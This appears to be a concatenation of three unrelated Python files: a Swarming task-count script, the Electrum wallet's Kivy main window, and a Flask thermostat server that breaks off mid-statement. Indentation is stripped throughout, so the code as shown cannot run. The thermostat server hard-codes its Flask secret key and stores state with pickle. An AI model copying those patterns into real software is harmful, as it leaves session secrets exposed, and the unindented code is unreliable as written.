data.append(('tags', tag))
cmd = [
sys.executable, os.path.join(CLIENT_DIR, 'swarming.py'),
'query', '-S', swarming, 'tasks/count?' + urllib.urlencode(data),
]
thread = threading.Thread(target=run, args=(day.strftime('%Y-%m-%d'), cmd))
thread.daemon = True
thread.start()
threads.append(thread)
while len(threads) > 100:
# Throttle a bit.
for i, thread in enumerate(threads):
if not thread.is_alive():
thread.join()
threads.pop(i)
sys.stdout.write('.')
sys.stdout.flush()
break
day = day + datetime.timedelta(days=1)
while threads:
# Throttle a bit.
for i, thread in enumerate(threads):
if not thread.is_alive():
thread.join()
threads.pop(i)
sys.stdout.write('.')
sys.stdout.flush()
break
print('')
data = []
while True:
try:
data.append(queue.get_nowait())
except Queue.Empty:
break
return dict(data)
def present(items, daily_count):
months = {}
for day, count in sorted(items.iteritems()):
month = day.rsplit('-', 1)[0]
months.setdefault(month, 0)
months[month] += count
years = {}
for month, count in months.iteritems():
year = month.rsplit('-', 1)[0]
years.setdefault(year, 0)
years[year] += count
total = sum(months.itervalues())
maxlen = len(str(total))
if daily_count:
for day, count in sorted(items.iteritems()):
print('%s: %*d' % (day, maxlen, count))
if len(items) > 1:
for month, count in sorted(months.iteritems()):
print('%s : %*d' % (month, maxlen, count))
if len(month) > 1:
for year, count in sorted(years.iteritems()):
print('%s : %*d' % (year, maxlen, count))
if len(years) > 1:
print('Total : %*d' % (maxlen, total))
if not daily_count:
print('')
graph.print_histogram(items)
STATES = (
'PENDING',
'RUNNING',
'PENDING_RUNNING',
'COMPLETED',
'COMPLETED_SUCCESS',
'COMPLETED_FAILURE',
'EXPIRED',
'TIMED_OUT',
'BOT_DIED',
'CANCELED',
'ALL')
def main():
parser = optparse.OptionParser(description=sys.modules['__main__'].__doc__)
tomorrow = datetime.datetime.utcnow().date() + datetime.timedelta(days=1)
year = datetime.datetime(tomorrow.year, 1, 1)
parser.add_option(
'-S', '--swarming',
metavar='URL', default=os.environ.get('SWARMING_SERVER', ''),
help='Swarming server to use')
parser.add_option(
'--start', default=year.strftime('%Y-%m-%d'),
help='Starting date in UTC; defaults to start of year: %default')
parser.add_option(
'--end', default=tomorrow.strftime('%Y-%m-%d'),
help='End date in UTC; defaults to tomorrow: %default')
parser.add_option(
'--state', default='ALL', type='choice', choices=STATES,
help='State to filter on')
parser.add_option(
'--tags', action='append', default=[], help='Tags to filter on')
parser.add_option(
'--daily-count', action='store_true',
help='Show the daily count in raw number instead of histogram')
parser.add_option(
'--json', default='counts.json',
help='File containing raw data; default: %default')
parser.add_option('-v', '--verbose', action='count', default=0)
options, args = parser.parse_args()
if args:
parser.error('Unsupported argument %s' % args)
logging.basicConfig(level=logging.DEBUG if options.verbose else logging.ERROR)
start = parse_time_option(options.start)
end = parse_time_option(options.end)
print('From %s to %s' % (start, end))
if options.swarming:
data = fetch_data(options.swarming, start, end, options.state, options.tags)
with open(options.json, 'wb') as f:
json.dump(data, f)
elif not os.path.isfile(options.json):
parser.error('--swarming is required.')
else:
with open(options.json, 'rb') as f:
data = json.load(f)
print('')
present(data, options.daily_count)
return 0
if __name__ == '__main__':
sys.exit(main())
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mFLO')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
Server.py
|
#!/usr/bin/python3
import flask
import os
import pickle
import time
from urllib import request
from urllib.error import HTTPError, URLError
import json
import threading
from hashlib import md5 # Super secure
import random
import logging
import shutil
from IO import IO
from logging.handlers import RotatingFileHandler
app = flask.Flask(__name__)
# Use this line to force cookies to expire
# every time the application is restarted
# app.secret_key = os.urandom(32)
app.secret_key = ' bbace2c841d9a06f382d1e4f5a97dc3d'
#app.debug = True
def storeobject(obj_name, obj):
with open('pickledb/%s.pickle' % obj_name, 'wb') as file:
pickle.dump(obj, file, pickle.HIGHEST_PROTOCOL)
def loadobject(obj_name):
with open('pickledb/%s.pickle' % obj_name, 'rb') as file:
obj = pickle.load(file)
return obj
def getoutsidetemp():
props = loadobject('props')
url = 'http://api.worldweatheronline.com/free/v2/weather.ashx'
url += '?key=%s&q=%s&num_of_days=0&format=json' % (
loadobject('weather_api_key'), loadobject('location'))
try:
data = json.loads(request.urlopen(url, timeout=3).readall().decode('utf-8'))
return data['data']['current_condition'][0]['temp_%s' % props['units']]
except (HTTPError, URLError) as e:
logging.warning(e.args[0])
return "err"
def periodicrun():
day_map = [('Sa', '5'), ('F', '4'), ('Th', '3'),
('W', '2'), ('T', '1'), ('M', '0'), ('S', '6')]
i = 0
while True:
time.sleep(1)
i += 1
props = loadobject('props')
if i % 60 == 0:
props['temp_outside'] = getoutsidetemp()
storeobject('props', props)
if i % 5 == 0:
props['temp_inside'] = '%.1f' % IO.gettemp()
storeobject('props', props)
if i % 10 == 0:
storeobject('props', props);
if props['status_ac'] == 'on':
IO.setac(1)
if props['status_ac'] == 'off':
IO.setac(0)
if props['status_ac'] == 'auto':
IO.setac(0) if IO.gettemp() < props['trigger_temp'] else IO.setac(1)
if props['status_heat'] == 'on':
IO.setheat(1)
if props['status_heat'] == 'off':
IO.setheat(0)
if props['status_heat'] == 'auto':
IO.setheat(0) if IO.gettemp() > props['trigger_temp'] else IO.setheat(1)
if props['status_fan'] == 'on':
# 'auto' is managed by IO.set__ to ensure it is always on when the ac or heat is.
IO.setfan(1)
if i % 31 == 0:
t = time.localtime()
year, month, day, hour, minute = t[:5]
weekday = t[6]
for event in props['events']:
# Event format: ['weekday <SMTWThFSa>', 'time <HHMM>',
# 'ac|heat|fan', 'auto|on|off', 'temp <TT>', 'F|C']
weekdays = event[0]
for d in day_map:
weekdays = weekdays.replace(d[0], d[1])
if str(weekday) not in weekdays:
continue
t = event[1] # Time format: 'hhmm'
if int(t[:2]) != hour or int(t[2:]) != minute:
continue
# Time for an event! Do something?
if (event[2] not in ('ac', 'heat', 'fan') or
